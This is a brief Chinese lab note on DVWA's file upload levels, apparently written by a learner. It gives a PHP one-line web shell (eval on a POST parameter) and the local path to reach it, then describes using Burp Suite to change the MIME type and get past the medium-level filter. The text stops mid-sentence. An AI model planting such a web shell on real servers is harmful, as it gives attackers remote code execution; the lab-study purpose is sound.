文件包含
low
<?php phpinfo();@eval($_POST[pp]);?>创建 a1.php 写入一句话木马 访问链接 127.0.0.1/dvwa-master/vulnerabilities/upload/../../hackable/uploads/a1.php
medium
需要用到 bp
和低等级代码比较 多了一条校验 mime类型的过滤条件 可以用 bp抓包修改
打开浏览器 代理 设置好bp的地址两边需要相同的ip和端口号
抓获原数据 对比作用
修改后数据 修改了mime类型
在响应中,Content-Type标头告诉客户端实际返回的内容的内容类型。浏览器会在某些情况下进行MIME查找,并不一定遵循此标题的值; 为了防止这种行为,防御